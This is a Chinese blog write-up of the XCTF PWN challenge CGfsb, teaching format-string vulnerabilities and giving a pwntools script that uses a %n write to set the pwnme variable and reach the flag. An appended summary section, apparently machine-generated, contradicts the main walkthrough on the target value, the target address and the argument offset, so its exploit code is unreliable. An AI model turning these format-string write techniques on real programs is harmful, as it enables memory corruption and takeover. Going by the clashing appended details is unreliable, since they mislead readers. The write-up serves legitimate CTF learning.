攻防世界PWN--CGfsb

本文介绍格式化字符串漏洞的基本概念及利用方法,包括常见的格式化函数如printf等,并通过实例展示了如何利用该漏洞进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先checksec

32位/

开了 Canary/NX保护

再运行一下

大致就是这个流程

接下来ida里面

分析C代码

分析前先get一下格式化字符串漏洞的基础知识

举3个常见的相关函数

  1. fprintf----prints to a FILE stream
  2. printf----prints to the 'stdout' stream
  3. sprintf--prints into a string

常见语法

  1. %d---打印   signed int
  2. %u---打印   unsigned int
  3. %s---打印参数地址处的字符串
  4. %x---打印hex形式的整数
  5. %p---打印指针

eg:

printf("%10c",0x41);

打印A,宽度为10

A前面会填充9个空格 

  1. %n  将当前已打印字符的个数写入参数地址处--4字节
  2. %hn------2字节
  3. %hhn-----1字节

eg:

1.printf("%10c%n",0x41,0x8048810);

打印9个空格+A,会往地址0x8048810处写入10(4字节) 

2.printf("%4132c%hhn",0x41,0x0804883B)

4132=0x1024,往地址0x0804883B处写入1字节0x24

关于$符号 

指定占位符对应第几个参数

eg:%10$x   %x对应第10个参数

 一个问题:

如果printf的参数不足,会发生什么?

假设这些参数存在,在对应的栈/寄存器上找到这些参数,将其打印出来

这样就会将栈上一些重要的信息地址泄露出来 ,向其写入后门函数,拿到shell

参数不足

32位直接泄露栈上地址/64位先泄露6个寄存器上的地址,再栈

如果  pwnme == 8 ,即可cat flag

先泄露出参数位置

 

用gdb确定参数的位置,可以发现,第10位 

接下来编写exp

 

找到pwnme的位置

from pwn import*
#p=remote("111.200.241.244",52498)
p=process('./CG')


payload=p32(0x804A068)+b'aaaa'+b'%10$n'
p.sendlineafter("please tell me your name:\n","aaaa")
p.sendlineafter("leave your message please:\n",payload)

p.sendline(payload)
p.interactive()

 

### 关于攻防世界 PWN CGFSB 的解题思路 #### 题目背景与环境设置 CGFSB 是一个典型的格式化字符串漏洞利用题目。通过给定的信息,了解到存在 `printf` 和 `fgets` 函数调用,这暗示可能存在格式化字符串漏洞的可能性[^1]。 #### 漏洞分析 通过对二进制文件的静态分析工具 IDA Pro 进行反汇编,确认目标是要修改内存中的某个特定位置的值为 `0x2223322`。由于程序中包含了不安全的函数调用方式(如未正确处理输入参数),使得攻击者能够控制格式化字符串的内容并影响堆栈上的数据布局[^2]。 #### 利用方法 为了成功完成此任务,需要构建合适的载荷 (payload),该载荷应满足以下条件: - 开始部分放置指向待写入地址的数据; - 使用 `%d` 类型说明符来调整数值大小; - 应用 `$n` 形式的长度指定符以覆盖目标存储单元。 具体实现如下所示: ```python from pwn import * # 建立远程连接至服务器 p = remote("example.com", port) # 构造有效负载 payload = p32(0x0804A048) + f'%{35795742}d%12$n'.encode() # 发送构造后的载荷 p.sendline(payload) # 转交互模式等待进一步指令 p.interactive() ``` 上述 Python 代码片段展示了如何创建一个针对 CGFSB 挑战的有效载荷,并将其发送到服务端执行。这里的关键在于理解如何计算正确的偏移量以及所需写的最终数值。 #### 安全建议 对于开发者而言,在编写 C/C++ 程序时应当避免使用易受攻击的标准库函数版本,转而采用更安全的选择,比如 `snprintf()` 或其他带有边界检查功能的方法。此外,启用编译器的安全特性也可以帮助减少此类风险的发生几率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值